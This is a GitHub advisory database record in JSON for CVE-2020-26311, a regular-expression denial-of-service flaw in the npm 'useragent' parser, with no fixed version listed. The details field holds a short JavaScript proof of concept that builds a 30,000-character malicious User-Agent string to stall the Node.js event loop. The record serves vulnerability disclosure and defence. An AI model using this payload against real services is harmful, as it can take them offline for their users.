{"id":"GHSA-mgfv-m47x-4wqp","summary":"useragent Regular Expression Denial of Service vulnerability","details":"Useragent is a user agent parser for Node.js. All versions as of the time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). Because a user agent parser is typically applied to the client-supplied User-Agent header, a single oversized header value can cause excessive backtracking and block the Node.js event loop while it is parsed. This advisory lists no fixed version, so bounding the length of the header before it is parsed is the practical safeguard.\n\n## PoC\n```js\nasync function exploit() {\n   const useragent = require(\\\"useragent\\\");\n\n   // Create a malicious user-agent that leads to excessive backtracking\n   const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';\n\n   // Parse the malicious user-agent\n   const agent = useragent.parse(maliciousUserAgent);\n\n   // Call the toString method to trigger the vulnerability\n   const result = await agent.device.toString();\n   console.log(result);\n}\n\nawait exploit();\n```","aliases":["CVE-2020-26311"],"modified":"2025-09-03T15:17:53Z","published":"2024-10-26T21:30:47Z","database_specific":{"github_reviewed":true,"cwe_ids":["CWE-1333"],"github_reviewed_at":"2024-10-28T15:01:50Z","nvd_published_at":"2024-10-26T21:15:14Z","severity":"MODERATE"},"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26311"},{"type":"WEB","url":"https://github.com/3rd-Eden/useragent/issues/167"},{"type":"WEB","url":"https://github.com/3rd-Eden/useragent/commit/4c3ee79358bea72d88fe78ac98f4f861db40b89b"},{"type":"PACKAGE","url":"https://github.com/3rd-Eden/useragent"},{"type":"WEB","url":"https://github.com/3rd-Eden/useragent/blob/ffa906f923183c85fbb9e6c90f19345e2bd3c52a/lib/regexps.js#L5568"},{"type":"ADVISORY","url":"https://securitylab.github.com/advisories/GHSL-2020-312-redos-useragent"}],"affected":[{"package":{"name":"useragent","ecosystem":"npm","purl":"pkg:npm/useragent"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"last_affected":"2.3.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-mgfv-m47x-4wqp/GHSA-mgfv-m47x-4wqp.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/U:Green"}]}